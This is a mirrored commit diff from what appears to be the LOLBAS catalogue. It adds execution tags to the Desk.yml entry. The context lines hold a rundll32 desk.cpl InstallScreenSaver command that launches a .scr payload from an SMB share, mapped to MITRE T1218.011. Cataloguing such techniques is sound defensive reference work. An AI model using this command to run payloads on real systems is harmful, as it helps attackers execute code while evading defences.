mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-30 16:54:00 +01:00
Update Desk.yml Tags
Added Tags: Execute: EXE Execute: Remote
This commit is contained in:
parent
e25d9fa435
commit
87241b3051
@ -11,6 +11,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.011
|
MitreID: T1218.011
|
||||||
OperatingSystem: Windows 10, Windows 11
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
|
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
|
||||||
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
|
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
|
||||||
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
||||||
@ -18,6 +20,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.011
|
MitreID: T1218.011
|
||||||
OperatingSystem: Windows 10, Windows 11
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
|
- Execute: Remote
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\desk.cpl
|
- Path: C:\Windows\System32\desk.cpl
|
||||||
- Path: C:\Windows\SysWOW64\desk.cpl
|
- Path: C:\Windows\SysWOW64\desk.cpl
|
||||||
|
Loading…
Reference in New Issue
Block a user